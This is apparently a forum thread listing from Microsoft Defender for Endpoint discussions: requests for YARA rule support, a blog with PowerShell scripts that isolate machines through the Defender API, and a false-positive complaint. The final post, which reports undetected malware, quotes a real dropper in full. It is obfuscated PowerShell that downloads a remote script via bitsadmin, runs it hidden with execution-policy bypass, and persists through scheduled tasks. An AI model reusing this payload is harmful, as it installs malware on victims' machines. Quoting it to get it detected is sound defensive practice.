Forum Widgets
Latest Discussions
Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon by Stefan Schörling. Step by step blog will guide you in how to automate responses with MDATP Flow connector. don't forget to show your love. Use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/YARA rule support
Hi everybody, I'm curious if Microsoft is planniung to support YARA rules. I think that this will become even more important in the future. I fould this verry old thread from 2019, where this question was asked from other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community Unfortunately, it looks like that nothing happend so far. Best regards Stefan
[MDE] Add the important feature, Yara rules if possible
Hi, Refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside pdf). (2nd link) All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for the incident responders to detect. The method of adding and detecting Yara rules has been in practice across companies for many years. Would you mind advising on any reason why not adding the important feature, Yara rules? It would be good if you include the important feature, Yara rules. If not, would you mind advising on converting from Yara rules to MDE query for querying via advanced threat hunting? Thanks much appreciated. 🙂 https://www.csa.gov.sg/singcert/Advisories/ad-2021-007 This link is the Yara rule. https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820Automate Windows Defender ATP response action: Machine isolation
5 Minutes Low complexity Response teams rely on powerful actions that allow them take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team’s workflow. In this blog, we’re going to demonstrate how you can automate the machine isolation response action. In our previous blogs we’ve demonstrated how you can: Setup an app and create a script to get WDATP’s alerts (Hello World blog) This is a good reference for when you need to create a new app. Grant more permission, get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog) This is a good source of information to learn how to add more permissions on apps. For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP’s powerful remediation capabilities. Just imagine how powerful it can be to detect a malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off network at time of response). In this blog, we’ll walk you through using the machine isolation API. This response action will leave the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo). What’s great about this demonstration is that it can be applied with the other response actions documented here. Let’s start In this section, we’ll walk you through the following: Step 1: Add the required permission to your application Step 2: Isolate a machine by machine ID or machine name Step 1 - Add the required permission to the application: If you haven’t created an app: Create an app using the instructions described in the Hello world blog. Then follow the instructions on how to Add Isolation Permission as described below If you’ve already created an app that you’re going to reuse for this demonstration: Add the “Isolate Machine” permission as described below We recommend that you follow the detailed steps as described in the “Step 1 - Add the required permission to the application” in the Alert Update API blog Add Isolation Permission Open Azure portal Navigate to Azure Active Directory > App registrations Under All Apps, find and select the application, for example ContosoSIEMConnector Navigate to Settings > Required permissions > Enable Access Select the checkbox for Isolate machine application permission. Click Save and Grant Permissions. Done! You have successfully added the required permissions to the application. Step 2 – Isolate a machine by machine ID or machine name: Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved). IsolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, #any comment that help [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, #the machineID or ComputerDnsName [Parameter(Mandatory=$true)] [ValidateSet('Full','Selective')] #validate that the input contains valid isolation type [string]$isolationType #the type of machine isolation ) $token = ./Get-Token.ps1 #Execute Get-Token.ps1 script to get the authorization token $url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate" $body = @{ "Comment" = $comment “IsolationType” = $isolationType } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop if($response.StatusCode -eq 201) #check the response status code { return $true #update ended successfully } else { return $false #update failed } Example 1: Isolate by machine DNS name Find the machine FQDN in the machine page (concatenate the machine name and the domain) For example, to isolate the machine testMachine.contoso.com use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment “isolate because of alert” -isolationType Full Example 2: Isolate by using machine ID Find the machine ID in the URL of the machine page For example, to isolate machine where machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “isolate because of alert” -isolationType Full Example 3: Isolate machines with severe alerts Read high severity alerts as described in the previous blogs Use the machine ID found in the alert to isolate the machine using the following script GetSevereAlertsAndIsolate.ps1 # Returns Alerts created in the past 1 hour. and Isolate machines with high severity alerts $token = .\get-token.ps1 $dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o") #create url with filter for date and severity $url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'" $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop #foreach alert, get the machineId and alertId and isloate machine while writing the alert ID in the isolation comments. foreach ($alert in $response.value){ $machineId = $alert.machineId $alertId = $alert.id $url = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate" $body = @{ Comment = "Isolate machine because alert - $alertId" } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop #check the isolatino request code and write to log file. if($response.StatusCode -eq 201) { Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully" } else { Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId" } } Example 4: Release machine (un-isolate) Save the script below as UnIsolateMachine.ps1 file to the same folder where you save the Hello World example (where Get-Token.ps1 was saved). UnisolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, [Parameter(Mandatory=$true)][string]$machineId ) $token = ./Get-Token.ps1 $url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate" $body = @{ Comment = $comment } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop return ($response.Content | ConvertFrom-Json) Use the following script in the same way to release the machine from isolation .\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “un-isolate – machine was found clean” Conclusion: In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate such as run an antivirus scan and restrict app execution. For more information, see more the other actions here . Let us know if you are interested in more specific remediation examples. In the next blog we’ll demonstrate the integration of alerts from other detection sources. Thanks! @Haim Goldshtein, security software engineer, Windows Defender ATP @Dan Michelson, program manager, Windows Defender ATP
False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up to the minute updates on occurrences like this?
Malware not detected (but it should)
Some days ago a colleague has received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded the zip contained2 files, a shortcut and a xml file the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'" so a cmd was started and then a powershell command to parse the content of the zip file the zip file contained the string below (to install the malware) Now the malware is correctly detected but a week ago it wasn't; the reason of concern is that Defender ATP SHOULD have detected a suspicious activity a zip was downloaded the lnk file when double-clicked created a task the task has launched a cmd, the cmd has launched a powershell and the powershell has gone through the file system to get the original zip and install the malware I'm wondering why no suspicious activity was detected. I also wonder why there is no a way to interact with MSFT support in such a case if you don't have a support plan; evidence is that i'm facing a product issue The string contained at the end of the zip file: $IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
